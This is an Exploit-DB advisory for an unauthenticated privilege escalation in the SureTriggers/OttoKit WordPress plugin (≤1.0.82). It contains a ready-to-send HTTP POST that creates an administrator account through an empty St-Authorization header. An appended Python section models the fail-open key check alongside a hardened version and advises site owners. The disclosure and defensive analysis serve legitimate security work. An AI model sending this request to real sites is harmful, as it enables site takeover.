SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation

EDB-ID: 52286
Platform: Multiple
Date: 2025-05-09

# Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
# Date: 2025-05-07
# Exploit Author: Abdualhadi khalifa (https://x.com/absholi7ly/)

# Affected Versions: All versions of OttoKit (SureTriggers) ≤ 1.0.82

Conditions for Exploitation
(source: https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/)

The vulnerability can be exploited under the following circumstances:

   1. OttoKit must be installed and activated on the target WordPress site.
   2. The plugin is *uninitialized* (e.g., no API key or "secret_key" is set
      in the database).
   3. The target site exposes the REST API endpoint
      '/wp-json/sure-triggers/v1/automation/action'.

------------------------------
HTTP Request

The following request targets the
/wp-json/sure-triggers/v1/automation/action endpoint to create an
administrator account (note the empty St-Authorization header):

POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email]=attacker@example.com&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&integration=WordPress&type_event=create_user_if_not_exists
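As an added, defender-side illustration that is not part of this advisory or of the plugin's code: a Python model of the kind of secret-key check that fails open when the key was never set (condition 2 above) and an empty St-Authorization header is compared against it, next to a fail-closed version. Function and variable names here are assumptions, not the plugin's.

```python
import hmac

# Constructed model of a REST "secret key" check; the names are assumptions and
# this is not the plugin's own code. stored_key stands for the value a site keeps
# in its options table; None means the plugin was never initialized.

def st_authorization(headers: dict) -> str:
    """Return the St-Authorization value, or '' when the header is absent or blank."""
    for name, value in headers.items():
        if name.lower() == "st-authorization":
            return value.strip()
    return ""

def vulnerable_verify(headers: dict, stored_key) -> bool:
    """Fails open: an unset key becomes '' and an empty or missing header
    compares equal to it, so the request is treated as authorized."""
    return st_authorization(headers) == (stored_key or "")

def hardened_verify(headers: dict, stored_key) -> bool:
    """Fails closed: no stored key or no supplied key means unauthorized;
    otherwise compare in constant time."""
    supplied = st_authorization(headers)
    if not stored_key or not supplied:
        return False
    return hmac.compare_digest(supplied.encode(), stored_key.encode())

# Constructed sample requests mirroring the header layout shown above.
UNINITIALIZED_KEY = None
CONFIGURED_KEY = "example-secret-set-during-setup"
EMPTY_HEADER = {"Host": "target.example", "St-Authorization": ""}
NO_HEADER = {"Host": "target.example"}
VALID_HEADER = {"Host": "target.example", "St-Authorization": CONFIGURED_KEY}
WRONG_HEADER = {"Host": "target.example", "St-Authorization": "guess"}

def compare_checks() -> dict:
    """Run both checks over the samples; True means the request would be accepted."""
    return {
        "vulnerable/empty-header/uninitialized": vulnerable_verify(EMPTY_HEADER, UNINITIALIZED_KEY),
        "vulnerable/no-header/uninitialized": vulnerable_verify(NO_HEADER, UNINITIALIZED_KEY),
        "hardened/empty-header/uninitialized": hardened_verify(EMPTY_HEADER, UNINITIALIZED_KEY),
        "hardened/no-header/uninitialized": hardened_verify(NO_HEADER, UNINITIALIZED_KEY),
        "hardened/valid-header/configured": hardened_verify(VALID_HEADER, CONFIGURED_KEY),
        "hardened/wrong-header/configured": hardened_verify(WRONG_HEADER, CONFIGURED_KEY),
    }

if __name__ == "__main__":
    for case, accepted in compare_checks().items():
        print(f"{case}: {'ACCEPTED' if accepted else 'rejected'}")
```

The practical takeaway for site owners is the same as the hardened branch: finish the plugin's setup so a secret key exists, and update past 1.0.82 so an empty header is never treated as a match.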